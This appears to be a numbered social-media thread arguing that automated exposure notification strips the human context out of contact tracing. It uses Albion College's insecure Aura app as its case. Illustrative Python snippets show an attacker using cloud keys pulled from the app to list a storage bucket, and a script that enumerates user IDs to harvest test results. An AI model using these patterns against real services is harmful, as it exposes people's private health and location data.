In the early days of the pandemic, the term "contact tracing" vaulted into the public consciousness: that's the shoe-leather-and-labor-intensive process whereby skilled health experts build a personal rapport with infected people in order to work out whom they had contact with.

1/
For both good reasons (the scale of the pandemic) and bad ones (tech's epistemological blindness, which insists that all social factors can be ignored in favor of quantifiable ones), there was interest in automating this process and "exposure notification" was born.

2/
The difference is that exposure notification tells you whether your device was near another device whose owner is sick. It doesn't tell you about the circumstances - like, was it one of the people at that eyeball-licking party? Or someone in the next car in a traffic jam?

3/
Exposure notification vaporizes qualitative elements of contact tracing, leaving behind just a quantitative residue of unknown value. There are two big problems with this: first, it might just not be very useful (that's what they learned in Iceland):

https://pluralistic.net/2020/05/12/evil-maid/#fjords

4/
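
To make that "quantitative residue" concrete, here's a minimal sketch of the only kind of record a Bluetooth proximity system can produce - the field names are invented for illustration, not any real protocol's schema:

```python
# A sketch of the only data a BLE exposure-notification event can carry --
# field names are illustrative, not Aura's or Google/Apple's actual schema.
from dataclasses import dataclass

@dataclass
class ProximityEvent:
    rolling_id: str        # rotating pseudonymous identifier broadcast by the other phone
    timestamp: int         # when the encounter happened (epoch seconds)
    duration_minutes: int  # how long the devices stayed in range
    signal_strength: int   # RSSI, a rough (and noisy) proxy for distance
    # Note what is NOT here: no field for "behind a car window in traffic,"
    # "wearing a mask," or "at the eyeball-licking party." The qualitative
    # context a contact tracer would ask about has nowhere to live.

event = ProximityEvent("a1b2c3", 1598000000, 12, -68)
```
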
The thing is, contact tracing is high-touch/low-tech because it is a social science intervention. Social scientists have always understood that if you only gather the data that's easy to reach, you'll come to bad conclusions skewed by defects in your collection.

6/
A canonical text on this is Clifford Geertz's "Thick Description," where he describes an anthropologist trying to figure out why a subject just winked: is it flirting? Dust in the eye? Something else? The only way to know is to ask: you can't solve this with measurement.

7/
To a first approximation, all the important stuff in our world has an irreducible, vital qualitative dimension. Take copyright exemptions: fair use rules are deliberately qualitative ("Is your use transformative in a way that comments on or criticizes the work it uses?").

8/
These are questions that reflect policy priorities: in the words of the Supreme Court, fair use is the "escape valve" for the First Amendment, the thing that squares exclusive rights for authors with the public's right to free expression.

9/
But the tech and entertainment industries have spent decades trying to jettison this in favor of purely quantitative measures: it's not fair use if your image incorporates more than X pixels from another, or if your video or sound includes more than Y seconds from another work.

10/
This is idiotic. Solving automation challenges by declaring the non-automatable parts to be unimportant is how we get self-driving car assholes saying, "We just need to tell people that they're not allowed to act unpredictably in public."

11/
All of this is a lead-up to the story of @Q3w3e3, an anonymous student at Michigan's @albioncollege, a private college that reopened after insisting that all students install a proprietary exposure notification app before returning to campus to lick each other's eyeballs.

13/
Albion paid some grifters to develop this app. Because of course they did. The app is called Aura, and it was created by a company called "Nucleus Careers."

14/
If you're thinking that's a weird name for a company building a public health app, you're right. They're a recruiting firm, founded this year, "with no apparent history or experience in building or developing healthcare apps."

https://techcrunch.com/2020/08/19/coronavirus-albion-security-flaws-app/

15/
Aura is predictably terrible. As @Q3w3e3 discovered when they audited it, the app stores all of the students' location data in an Amazon storage bucket - and ships with the keys to access that data hard-coded into the app itself.

16/
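
To see why hard-coded keys are game over, here's a hedged sketch of what anyone who unpacks the app can do with them - the bucket name and credentials below are placeholders, not Aura's actual values:

```python
# Why hard-coding cloud keys into a shipped app is game over: anyone who
# unzips the app package gets the same credentials the app uses. The bucket
# name and keys below are placeholders, not Aura's actual values.
import boto3

s3 = boto3.client(
    "s3",
    aws_access_key_id="AKIA...EXTRACTED_FROM_APP",   # found via `strings` or a decompiler
    aws_secret_access_key="EXTRACTED_SECRET_KEY",
)

# With the app's own credentials, an attacker can enumerate every object --
# in Aura's case, students' location data -- just as the app itself can.
for obj in s3.list_objects_v2(Bucket="example-aura-bucket").get("Contents", []):
    print(obj["Key"])
```
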
The app also allows attackers to trivially discover the test status of any registered user. @TechCrunch discovered this bug and hypothesizes that an attacker could get the health data of 15,000 people this way. Did someone say #HIPAA?

17/
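
The class of bug TechCrunch describes is a textbook insecure direct object reference. Here's a hypothetical sketch of how 15,000 records could fall out of it - the endpoint and ID scheme are invented for illustration, not Aura's real API:

```python
# The general shape of an IDOR: per-user records reachable by guessable IDs
# with no authorization check. The URL and ID scheme are hypothetical
# stand-ins, not Aura's actual API.
import requests

BASE = "https://api.example-aura.invalid/users/{uid}/status"

def scrape_statuses(start=1, end=15000):
    """Walk sequential user IDs and collect whatever the server hands back."""
    leaked = {}
    for uid in range(start, end + 1):
        resp = requests.get(BASE.format(uid=uid), timeout=5)
        if resp.ok:
            leaked[uid] = resp.json()  # e.g. a name plus a COVID test result
    return leaked
```
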
Nucleus Careers refused to talk with TechCrunch's @zackwhittaker about this beyond a few Glomar-ish non-statements. But the school administration is standing behind the app, threatening to expel students who don't use it.

18/
And this brings us to the second big problem with the denatured, quantitative residue of the thick, qualitative process of contact tracing. Many of the students who have the most to lose from using the app are also at the highest risk of contracting the disease.

19/
People struggling with addiction, queer kids who aren't out and have secret partners, and people engaged in survival sex work are all at higher risk of exposure - and they also have the biggest reason NOT to use the app, lest it leak their secrets.

20/
These are the people who you absolutely WANT to include in public health efforts, but that can only happen through noncoercive, personal, high-trust, low-tech interventions.

21/
In other words, Aura isn't just technologically inept - it's also epidemiologically inept. The cliché that "you treasure what you measure" could not be more applicable here.

22/
Look, these students shouldn't even be on campus. Obviously. And even a good contact tracing system would probably mostly serve as a postmortem for analyzing the inevitable conflagration of infection incoming in 3...2...1

23/
But Albion is still a fascinating case study in the lethal incoherence of managerial and technology circles' shared contempt for "human factors."

At the very least, we should ensure that the lives they will squander through their hubris aren't totally wasted.

eof/